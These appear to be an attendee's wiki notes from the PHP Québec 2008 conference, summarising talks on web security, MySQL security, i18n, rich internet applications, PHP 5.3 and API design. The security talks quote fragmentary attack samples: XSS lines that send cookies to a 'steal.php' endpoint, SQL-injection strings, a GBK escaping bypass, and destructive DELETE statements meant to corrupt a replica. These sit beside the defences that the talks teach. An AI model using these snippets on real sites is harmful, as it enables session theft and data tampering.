=Liens externes=
* [http://conf.phpquebec.com/fr/ Site officiel] de la conférence
* [http://www.go-referencement.org/conferences-et-evenements/conference-php-quebec-2008-resume.html Quelques slides]
=Infos supplémentaires=
* Il y a un DVD, sur la conférence de 2004, de disponible dans le bibliothèque
=Jour 1 - Jeudi=
==The age of literate machines==
- Speaker: Zak Greant
- High interest, mostly philosophical conference
- The communcation since the beginning
- The power of the information
- scribes, printers, etc
- Control of the information (book burning, people killing)
- Publication monopol
- with Radio and TV people lost the communication power
- we regaining it with the internet
- Use openstandards
==Performance-minded MySQL for PHP Developers==
- Speaker: Jay Pipes (MySQL inc.)
- PDF:
==Help. My web site has been hacked! Now what?==
- Speaker: Eli White
- Skills: Software (not hardware or sysadmin)
- digg.com/jobs? he talk a lot about it in exemples
- eliw.com or digg.com—EliW
- book: PHP 5 in practice
- Thinking about security
- 3 stages
- prevention
- preparation
- panic
- Definition of hacked
- SQL Injection
- XSS
- CSRF (Cross Site...)
- Session Hikacking
- Not talking here about: network attacks,
apache/php/mysql, physicals
- Sql Injection
- Validate every entry received by the user
- User send data that is interpreted by the database
- XSS
- User send data that is directly interpreted as HTML (and
therefore javascript)
- CSRF
- Forge or force a request on bejahalf of another user
- ex: inject an img tag that load an image from another web
site
- SessionHijacking
- session_start()
- session_regenerate() Upon anychamge of permission
- if ($_SESSION !=regenerate_secret()
- Discovery methods
- whitehat, hacker announce & axploit, user complaints,
physical demarcation, logs/stats monitoring
- hints:
- check for sql statement in apache logs
- Immediate response
- Let it live
- Break functionality
- shutdown website
- look around to find everything that have been exploited,
currupted, so on.
- lookup hacker announces it could help find the issue
- view source
- view generated source
- scan for all javascript and .js files
- look for iframes
- looking logs
- limit timeframe
- look for odd or out of sequence events
- scan for GET parameters that are improper
- san other fields such as refer and useragent
- tracks: who, when, ip, refer and more
- logs all SQL query that fails
- first attempts will failed
- malformed SQL are best culprits
- scan for common XSS terms (script, onclick, onfocus)
- lookup database for bad data
- ex: select username from usertable where username
like '%onclick%'
- Obscure Stuff
- Refer, UserAgent, Cookies, etc
- htmldecode() after escaping, encoded javascript, etc
- if there is a change between php/html/database encoding
(utf, iso, ...) the escaping should not work properly
==Security 2.0==
- Speaker: Chris Shiflett
- csrf / xss(cross side scription) / 2.0h
- shiflett.org omniti.com
- phpsecurity.org phpsec.org
- Book: Essential php security (O'Reilly)
- web 1.0 vs web 2.0
- contextual, user collaboration, services, blogs, tagging
- taxonomy vs folksonomy
- XSS
- attacker -input-> target (you / website) -html-> victim
- stealing cookies
- document. =
'..steal.php?'.encodeURI(document.cookies);
- stealing form data
- document.forms[0].action = '..steal.php';
- using hidden form in a page, using browser auto-fill
form function to steal pw
- FIEO (Filter input, Escape output)
- input -filter-> buisness logic -escape-> output
- CSRF (cross site request forgery)
- attacker -> victim -> target (you / website)
- ex: add an tag requesting an URL to buy something
while a user is logged
- could block this by forcing POST request and not
accepting GET request
- ex: using iframe with a form and script
- script could be document.buy.submit();
- exemples shiflett.org—amazon.php
4diggers.blogspot.com
they are fixed but are
good examples
- script new
Image().src='...url...encodeURI(document.cookies)'...
- Anti-CSRF Token
- $token = md5(uniqid(rand(),TRUE));
- $_SESSION['token'] = $token;
- $html['token']=htmlentities($token), ENT_QUOTES,
'UTF-8');
- add input type=hidden name=token value = echo
$html['token']
- AJAX (Asynchronous JavaScript + XML)
- Client Side technology/technique that allow twoway
communication between the client and the server whithout
reloading the page.
- Browser hijacking
shiflett.org—using-csrf-for-browser-hijacking
==PHP For Polyglots - Web applications and i18n==
- Speaker: Marc Wandschneider
- Powerpoint:
- Keynote:
- UTF-8
- PHP
- Utiliser mb_ functions pour un meilleur support de UTF-8 (mb_strlen, mb_substr, etc)
- Utiliser les array() pour les langues
- Javascript
- Utiliser PHP pour dumper les "traductions" en format supporter par Javascript
- URL
- Conseille, si possible, de passer la langue de le URL (ex.: http://domain.com/fr-CA/video)
- En gros, la plupart de ses conseils sont déjà appliqués dans EspaceCanoë
==Rich desktop application==
- Speaker: Raphaël Rougeron
- (conférence en français) Communiquer avec lui pour avoir son
framework REST
- www.stato-framework.org
- RIA (Rich Internet Application) / RDA (Rich Desktop
Application)
- RIA
- Libraries AJAX
- XUL + CSS + JS
- Flash/Flex
- Silverlight (like flash player)
- Applet Java
- RDA
- XulRunner
- Adobe AIR
- .NET (WPF)
- Java Web Start
- Entre les 2
- Google Gears : local storage
- Prism
- Adobe AIR
- windows et osx (bientot linux)
- flash+as ou flex+ax ou html+css+js
- moteur webkit
- support audio / video (flash & h264)
- supporé par jQuery, extjs, dojo, ...
- XulRunner (XML based User interface Language)
- moteur gecko
- XBL : définition de composants d'interface
- XPCOM: création de composants métiers réutilisables en
JS, C, C++, Python
- API JS
- manipulation d'images
- systeme de fichier
- drag'n drop
- SongBird, Miro, Joost, webophone, comodo
- Audio/Video, utilisation d'un composante basé sur VLC
- RDA Recommandations
- Indicateurs d'activité (loading...)
- Gestion des raccourcis claviers
- Implémenter le copier-coller
- survol des boutons
- Adopter le look & feel des applis desktop
- AIR vs XULRunner
- Pour s'initier à XUL Runner, faire une extension firefox
est un bon départ
- Relations client-serveur
- Utilisation la plus simple: REST
- Ressources et URIs
- GET, POST, PUT, DELETE, HEAD, OPTIONS
- Code d'états: 200 OK, 201 Created, 400 Bas Request,
etc.
- Représentation des ressources: XML, JSON, Atom, RSS,
ical, csv...
- Penser ressoures plutôt qu'actions
- GET /posts : GET /posts
- POST /posts/add : POST /posts
- GET /posts/get/123 : GET /posts/123
- Pas de support REST dans Zend (meme ZendRestServer),
ni symfony ni cakephp, codelgniter
- 2 framework rest: Konstruct et tonic
- propre framework http://
- Rails 1.2 essai de controlleur restfull
- Creation de ressources contenant des actions GET, POST,
PUT, DELETE
- WADL (wsdl pour le rest)
- RADAR (Dave Thomas) Rest Application, Dumb-Ass
Recipient
==PECL: The php language workbench==
- Sebastian Bergmann
- sebastian-bergmann.de
sebastian-bergmann.de—talks
- PECL: Php Extension C Library
- php5? pecl? meta programming? aop?
- PECL has extension that
- add normal functionality to php
- add not so normal
- operator
- vld (vulcan logic disassembler)
- parsekit
- parse tree
- runkit
- intercept
- Operator overloading
- about each operator like +, -, *, >>, ...
- disassembler for php bytecode
- alias vld="php -dvld.active=1 -dvld.execute=0"
- //could also look at something named "depends"
- ext/parsekit
- parsekit_compile_string()
- parsekit_compile_file()
- ext/parse_tree
- //speaking about code sniff
- usefull for analysis and refactoring of php source code
- Aspect-oriented programming w php // interlude
- new modularization concept
- Quantification
- Obliviousness
- aspect, pointcut, around
- ext/runkit
- replace, rename and delete classes methods and function
at runtime
- define additional super-global variables
- execute code in a sandbox
- ex: runkit_method_add(...)
- Generic Aspects for PHP
- ext/intercept
- Intercept function calls
- execution before and after code is executed
==Introductoin to php 5.3==
- Llia Alshanetsky
- ilia.ws
- Core php developper
- Adding namespace
- namespace MY;
- function MY_wrapper();
- use MY as MY
- wrapper()
- Multiple namespace per file
- Autoload function
- Improved performance
- md5 10-15% better
- better stack
- ...
- Operator ?:
- __call() équivalent but for static methods
- late static binding
- MySQLInd
- specialized hich speed library to interface with MySQL
- better performance, improver memory usage, ability to
fetch stats for perf. tuning, built-in driver, no
PDO_Mysql Support yet
- .htaccess style ini controls
- per-directory ini settings inside php.ini
- improved config error handling
- Extra OpenSSL Functions
- openssl_get_md_methods()
- openssl_digets()
- openssl_get_cipher_methods()
- openssl_encrypt()
- openssl_decrypt()
- openssl_pkey_new() / openssl_pkey_get_details()
- SPL Improvements
- FilesystemIterator
- GlobIterator
- Date Extension additions
- strtotime via date_Create_From_format('format','date')
- return and object formatable using
$returned_date-format('format');
- date_get_last_errors()
- warning count
- àwarnings
- error_count
- errors
- getopt() improvement
- native implementation
- cross-platform support
- XSLT profiling
- $xslt = new xsltprocessor();
- $xslt->importStylesheet($xml);
- $xslt->setProfiling("/tmp/profile.txt");
- $xslt->transform...
- E_DEPRECATED
- Garbage collector
- gc_enable()
- var_dump(gc_enabled())
- var_dump(gc_collect_cycles())
- gc_disable()
- Miscellaneous
- sqllite upgraded 3.5.6
- 40 bugs fix
- CGI/FastCGI SAPI Improvement
- stream improvements
=Jour 2 - Vendredi=
==API Design==
- David Sklar
- David@ning.com
- PHP API - REST API
- XN_Content exemple
- $dinner = XN_Content::create('Meal');
- $dinner->title = 'Salt baked combo';
- $dinner->save();
- gives
- POST /xn/atom/1.0/content
- Content-Type: text/xml; charset=UTF-8
- Design priorities
- promote predictability, modularity, stability
- choose human performance over computer performance
- make efficiency easy, make inefficiency hard/impossible
- At the start
- write code before tou write the API
- use cases, use cases, use cases
- Names matter (but don't discuss them forever)
- Use the API before it exists
- sketch out what you want to do
- Use cases first
- what does the API need to do (not what it could do)
- Need-Driven Development
- adding is easy, removing is hard
- you have a lots of freedom with arguments
- accessors provide insulation
- long parameter list are toxic
- static n dynamic analysis
- find + grep
- XN_Event
- before and after events.
- Names
- at Ning, adding XN means "hands off"
- class names
- property names
- xml namespace prefixes
- Documentation: docblocks: Yay! and Boo!
- phpdocumentor, doxygen
- Avoiding attribute naming conflict between system attr. and
user attr.
- content->title and content->my_attrib YES!
- content->xn_title and content->attrib YES!
- content[title] and content->attrib NO! (not mixing up
syntax)
- Testing and code coverage
- contract with user id the test suite
- "The extent of your test suite is the strength of your
contract with your users"
- SimpleTest www.lastcraft.com—simple_test.php
and PHPUnit
phpunit.de
- To keep in mind
- Lean towards use cases tacher than unconstrained
possibilities
- naming, versioning and documentation are not afterthoughts
- test suite code coverage is all you have to guarantee
backwards compatibility
- lcsd05.cs.tamu.edu—keynotepdf
- framework.zend.com—manual
- ez.no—component...
- http:///jobs.ning.com/ david@ning.com
==Security from the Database Perspective==
- Morgan Tocker morgan@mysql.com
- Security is a process not a product,
- Some of the problems
- sql injection
- The application does not check input data before
passing it on to the database
- magic_quotes
- mysql_real_escape_string()
- integer based injection
- multibyte character
- in GBK 0xbf27 become garbage+quote in single
byte charset.
- bypass login, change data, send email or exec system
cmd, ....
- .... and I=0 union select database()
- ... and i=0 union select ....
- ... or ''=''
- denial of service
- execute a long select... that lock database
- Deep search result
- limit to the first N hundreds
- log the queries (log-slow, log-query, log-query not
using indexes)
- build application that could handle failure of
queries and retry
- email your self alerts by monitoring the SHOW
PROCESSLIST
- running with higher privileges thant required
- LOAD DATA LOCAL INFILE feature
- potential load in /etc/passwd if running as root
- SHOW GRANTS
- SHOW GRANTS for 'morgo'@'hostname'
- modify mysql.user and FLUSH to update
- use GRANT DELETE, INSERT, SELECT, UPDATE, CREATE
TEMPORARY TABLES ON database.table TO
'username'@'host' IDENTIFY BY 'password'
- avoid wildcard for access
- connection pooling issues
- opened transaction not freed
- temporaty rables created not freed
- session variables not freed
- prepared statements not freed
- mtocker.livejournal.com
...
- set sql_log_bin=0; delete from..
- both in operating system and in mysql
- exposing the database server on 3306
- see --bind-address=127.0.0.1 and --skip-networking
options
- watch out for potentially expensive reverse lookups
- Others ideas
- Intentionally corrupting masters or slaves (proof of
concept)
- delete from users where user_id = 1 and @@server_id=2
- delete from users where user_id = 1 and @@server_id =
SYSDATE()%10+1
- Defenses
- Correctly escape data (mysql_real_escape_String and type
checking for integers)
- potentially use prapared statements
- see mysql_secure_installation
- set root password
- remove anonymous users
- disallow root remote login
- remove test database and access to it
- tmp_table_size, max_heap_table_size : use low session
based buffers values
- set user limits within users to parts of the application
- max user connections (max conn per hour, max queries per
hour) dev.mysql.com—grant.html
- limit max_join_size to prevent cartesian products
- sql_mode
- use md5() or shai() to store password
- secure/encrypt your backups
- prepare to change connect(..) pw in case of a leak
- 32bits hw allow 2.2-2.7G handling and crash after that
- no on the fly encryption, use AES encrypt/decrypt within
statements
- using store procedure and/or views
- adjust permissions to sp or v
- using that solution, doesn't support debugging or
other languages than SQL
- could check at mysql proxy (new product)
- overhead select 1
- performance issues could come on longer statement as
they should be completly received before passed to
the server
- could by used to rewrite queries or manipulate them
==RIA With open standards==
- jeff griffiths, ActiveState jeffg@activestate.com
- RIA is a slippery buzzword
- showing Desktop application examples
- beatport.com
- songbird
- joost
- Why should we care
- PHP is the cominant back-end application server
- Even pure back-end application design should pay
attention to RIA application design
- RIA is the future or something
- Components of RIA
- Server Back-end (php mysql apache)
- application layer
- multi-media run-time of some sort
- Server Side
- php and similar lead devl.
- Application Layer
- XML/HTML ui layer
- JavaScript/ActionScript scripting layer (js functionnal
language vs php procedural/object language)
- Styling / presentation layer
- Reason to choose web standards
- graceful degradation instead of a 'please
download/upgrade flash' link
- powerful new javascript tools and libraries like extjs,
yui, jquery
- great opensource developer tools
- maintain a consistent code base in one set of
technologies instead of having to maintain multiple
front-ends in differents technologies
- tools for open stantards
- firebug for firefox
- IE8 apparently has a firebug clone
- opensource ide support from aptana and activestate komodo
edit activestate.com
- Multi-media
- common ability for an RIA is to display streaming audio
and video
- the ubuquity of the flash runtime in mainstream browsers
makes it the default, and currently most pragmatic choice
- The plugin problem
- Multimedia on the web is a hack; it is netscape's
fault for not implementing audio/video native from
the beginning.
- Finally, the mere benifit of audio/video handling is
not a sufficient reason to encapsulate your
application inside a black box runtime. Yet audio
and video streaming are the main use of Flash on the
web.
- challenges
- flash and flex has a great story currently for
mainstream browser support
- The iphone thing
- Steve jobs told that flash is too slow for
the iphone
- essentially eliminates a pure flash solution
for manu mobile users
- the iphone user base is a disporportionately
important market
- Macromedia/adobe has been able to fatten flash
for years thanks to Moore'S law
- moore's law does not applu to mobile devices
- flash will have to get faster, not more complex
- youyube doesn't use animation features anyway
- alternatives
- HTML5 spec introduces the and tags
- VLC
- Pragmatic approach
- for an RIA as a website
- limit use of flash to media player capabilities
not application logic
- use open source tools such as swfobject and XSPF
or the totally awesome Flowplayer
- have a plan for degrading media capabilities in
mobile browser
- for a desktop application
- consider xulrunner or prism
- re-use as much front-end logicas possible for all
client profiles
- Mobile will be more hell thant ie3 ns4 old time
==I Found a bug in my code==
- Derick Rethans, ez System A.S. dr@ez.no
derickrethans.nl—talks.php
- PHP Development mcrypt, input_filter, date/time support,
unicode
- Xdebug
- an open source debugging tool
- about 4 years old
- version 2 is about to be released
- works (at least) on linux, mac and windows
- Installing
- with pear
- pear install xdebug-beta
- without
- wget , tar, cd, phpize, ./configure, make, make intall
- zend's extensoins (optimizer, debugger ,cache) prohibit
xdebug form loading
- limit recursive level
- php -r 'function a() { a()l}; a();'
==High Performance PHP & MySQL scaling techniques==
- Speaker: Eli White (digg.com)
-